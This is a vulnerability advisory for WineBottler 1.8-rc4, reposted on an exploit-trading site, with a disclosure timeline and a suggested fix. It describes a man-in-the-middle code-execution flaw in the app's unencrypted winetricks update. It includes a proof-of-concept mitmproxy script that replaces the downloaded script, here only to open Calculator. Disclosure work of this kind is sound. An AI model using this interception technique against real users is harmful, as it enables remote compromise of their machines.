0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution Vulnerability
Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles Metadata =================================================== Release Date: 17-10-2016 Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc) Affected product: WineBottler (http://winebottler.kronenberg.org/) Affected versions: up to the still current version 1.8-rc4 Tested on: OS X El Capitan 10.11.6 CVE : product not covered URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/ Video: https://youtu.be/nwcZIn2s6Vc Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue Product Description =================================================== WineBottler packages Windows-based programs like browsers, media-players, games or business applications snugly into Mac app-bundles. Vulnerability Description =================================================== Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man in the middle remote code execution vulnerability. The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surfe. PoC =================================================== 1.) Setup an HTTP proxy like Burp (https://portswigger.net/burp/) 2.) Redirect all HTTP traffic to this proxy 3.) Launch WineBottler 4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script. 5.) Remote code execution has been gained! The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack: from mitmproxy.models import decoded NEWLINE = '\r\n' def response(context, flow): if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == 301 and flow.request.method=="GET": flow.response.status_code=200 # overwrite 301 status code to 200 with decoded(flow.response): # automatically decode gzipped responses. flow.response.content = "" # replace original script to launch Calculator.app flow.response.content += '#!/bin/sh'+NEWLINE flow.response.content += '/usr/bin/open /Applications/Calculator.app' Disclosure Timeline =================================================== 29.5.2016: The issue has been discovered 30.5.2016: Tried to establish initial contact with the developer using Facebook 31.5.2016: Requested CVE number; Retried to contact developer using Facebook 1.6.2016: MITRE declined CVE: The product is not covered. 2.6.2016: Created this documentation; Sent to developer using mail 18.6.2016: Developer responded on Facebook 20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure 25.7.2016: Tried to contact developer as no new version has been released a no success 29.7.2016: Initially agreed public disclosure date a rescheduled 31.7.2016: Tried again to contact developer a again no success. 13.8.2016: Tried a last time to get in touch with the developer a again no success 17.10.2016: Public disclosure altough unfixed: Developer unresponsive since several month Suggested Solution =================================================== All request should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planing to do so in the future. Yet, right now there is no patch available. The only workaround would be to block outgoing (HTTP) connections - However, whenever I tried that WineBottler stalled... # 0day.today [2024-07-05] #